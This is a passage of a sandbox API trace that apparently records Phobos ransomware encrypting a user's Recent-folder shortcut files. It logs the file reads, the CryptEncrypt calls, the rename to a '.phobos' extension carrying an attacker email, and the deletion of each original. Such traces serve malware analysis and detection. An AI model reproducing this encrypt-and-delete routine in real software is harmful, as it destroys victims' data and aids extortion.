HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\wI68lpv8Qm0zZ6.flv.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\wi68lpv8qm0zz6.flv.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0201.652] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32a28) returned 1 [0201.652] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0201.652] ReadFile (in: hFile=0xfc, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0xa04, lpOverlapped=0x0) returned 1 [0201.660] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xa10, dwBufLen=0xa10 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xa10) returned 1 [0201.660] WriteFile (in: hFile=0x174, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xa10, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xa10, lpOverlapped=0x0) returned 1 [0201.661] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32928) returned 1 [0201.661] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0201.661] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0201.661] CryptDestroyKey (hKey=0xa32928) returned 1 [0201.661] WriteFile (in: hFile=0x174, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0201.661] CryptDestroyKey (hKey=0xa32a28) returned 1 [0201.661] CloseHandle (hObject=0xfc) returned 1 [0201.661] CloseHandle (hObject=0x174) returned 1 [0201.661] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\wI68lpv8Qm0zZ6.flv.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\wi68lpv8qm0zz6.flv.lnk")) returned 1 [0201.662] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0201.662] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\wSEjhu9leF-.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\wsejhu9lef-.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0201.663] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=5050) returned 1 [0201.663] CloseHandle (hObject=0x174) returned 1 [0201.663] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\wSEjhu9leF-.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\wsejhu9lef-.lnk")) returned 0x20 [0201.663] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\wSEjhu9leF-.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\wsejhu9lef-.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0201.663] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\wSEjhu9leF-.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\wsejhu9lef-.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0201.663] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0201.663] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0201.663] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\wSEjhu9leF-.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\wsejhu9lef-.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0201.664] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32a28) returned 1 [0201.664] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0201.664] ReadFile (in: hFile=0x174, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x13ba, lpOverlapped=0x0) returned 1 [0201.665] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x13c0, dwBufLen=0x13c0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x13c0) returned 1 [0201.665] WriteFile (in: hFile=0xfc, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x13c0, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x13c0, lpOverlapped=0x0) returned 1 [0201.666] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32928) returned 1 [0201.666] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0201.666] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40, dwBufLen=0x40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40) returned 1 [0201.666] CryptDestroyKey (hKey=0xa32928) returned 1 [0201.666] WriteFile (in: hFile=0xfc, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf2, lpOverlapped=0x0) returned 1 [0201.666] CryptDestroyKey (hKey=0xa32a28) returned 1 [0201.666] CloseHandle (hObject=0x174) returned 1 [0201.666] CloseHandle (hObject=0xfc) returned 1 [0201.666] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\wSEjhu9leF-.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\wsejhu9lef-.lnk")) returned 1 [0201.667] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0201.667] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\WSMf-LY8_MIH2e52JL_.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\wsmf-ly8_mih2e52jl_.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0201.671] GetFileSizeEx (in: hFile=0xfc, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=5323) returned 1 [0201.671] CloseHandle (hObject=0xfc) returned 1 [0201.671] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\WSMf-LY8_MIH2e52JL_.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\wsmf-ly8_mih2e52jl_.lnk")) returned 0x20 [0201.671] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\WSMf-LY8_MIH2e52JL_.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\wsmf-ly8_mih2e52jl_.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0201.671] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\WSMf-LY8_MIH2e52JL_.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\wsmf-ly8_mih2e52jl_.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0201.671] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0201.671] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0201.671] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\WSMf-LY8_MIH2e52JL_.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\wsmf-ly8_mih2e52jl_.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0201.672] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32a28) returned 1 [0201.672] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0201.672] ReadFile (in: hFile=0xfc, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x14cb, lpOverlapped=0x0) returned 1 [0201.673] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x14d0, dwBufLen=0x14d0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x14d0) returned 1 [0201.674] WriteFile (in: hFile=0x174, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x14d0, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x14d0, lpOverlapped=0x0) returned 1 [0201.674] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32928) returned 1 [0201.674] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0201.674] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0201.674] CryptDestroyKey (hKey=0xa32928) returned 1 [0201.674] WriteFile (in: hFile=0x174, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0201.675] CryptDestroyKey (hKey=0xa32a28) returned 1 [0201.675] CloseHandle (hObject=0xfc) returned 1 [0201.675] CloseHandle (hObject=0x174) returned 1 [0201.675] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\WSMf-LY8_MIH2e52JL_.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\wsmf-ly8_mih2e52jl_.lnk")) returned 1 [0201.676] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0201.676] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\XaJxiZV.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\xajxizv.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0201.676] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=3684) returned 1 [0201.676] CloseHandle (hObject=0x174) returned 1 [0201.676] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\XaJxiZV.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\xajxizv.lnk")) returned 0x20 [0201.676] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\XaJxiZV.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\xajxizv.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0201.677] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\XaJxiZV.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\xajxizv.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0201.677] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0201.677] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0201.677] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\XaJxiZV.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\xajxizv.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0201.678] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32a28) returned 1 [0201.678] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0201.678] ReadFile (in: hFile=0x174, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0xe64, lpOverlapped=0x0) returned 1 [0201.679] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xe70, dwBufLen=0xe70 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xe70) returned 1 [0201.679] WriteFile (in: hFile=0xfc, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xe70, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xe70, lpOverlapped=0x0) returned 1 [0201.680] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32928) returned 1 [0201.680] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0201.680] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40, dwBufLen=0x40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40) returned 1 [0201.680] CryptDestroyKey (hKey=0xa32928) returned 1 [0201.680] WriteFile (in: hFile=0xfc, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf2, lpOverlapped=0x0) returned 1 [0201.680] CryptDestroyKey (hKey=0xa32a28) returned 1 [0201.680] CloseHandle (hObject=0x174) returned 1 [0201.680] CloseHandle (hObject=0xfc) returned 1 [0201.680] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\XaJxiZV.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\xajxizv.lnk")) returned 1 [0201.681] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0201.681] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\XsbvW.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\xsbvw.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0201.682] GetFileSizeEx (in: hFile=0xfc, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=6645) returned 1 [0201.682] CloseHandle (hObject=0xfc) returned 1 [0201.682] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\XsbvW.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\xsbvw.lnk")) returned 0x20 [0201.682] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\XsbvW.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\xsbvw.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0201.682] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\XsbvW.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\xsbvw.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0201.682] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0201.682] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0201.682] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\XsbvW.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\xsbvw.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0201.683] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32a28) returned 1 [0201.683] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0201.683] ReadFile (in: hFile=0xfc, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x19f5, lpOverlapped=0x0) returned 1 [0201.685] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x1a00, dwBufLen=0x1a00 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x1a00) returned 1 [0201.685] WriteFile (in: hFile=0x174, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x1a00, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x1a00, lpOverlapped=0x0) returned 1 [0201.686] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32928) returned 1 [0201.686] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0201.686] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40, dwBufLen=0x40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40) returned 1 [0201.686] CryptDestroyKey (hKey=0xa32928) returned 1 [0201.686] WriteFile (in: hFile=0x174, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf2, lpOverlapped=0x0) returned 1 [0201.686] CryptDestroyKey (hKey=0xa32a28) returned 1 [0201.686] CloseHandle (hObject=0xfc) returned 1 [0201.686] CloseHandle (hObject=0x174) returned 1 [0201.686] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\XsbvW.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\xsbvw.lnk")) returned 1 [0201.687] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0201.687] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\XsP7HX.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\xsp7hx.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0201.688] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=5252) returned 1 [0201.688] CloseHandle (hObject=0x174) returned 1 [0201.688] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\XsP7HX.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\xsp7hx.lnk")) returned 0x20 [0201.688] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\XsP7HX.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\xsp7hx.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0201.688] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\XsP7HX.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\xsp7hx.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0201.688] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0201.688] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0201.688] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 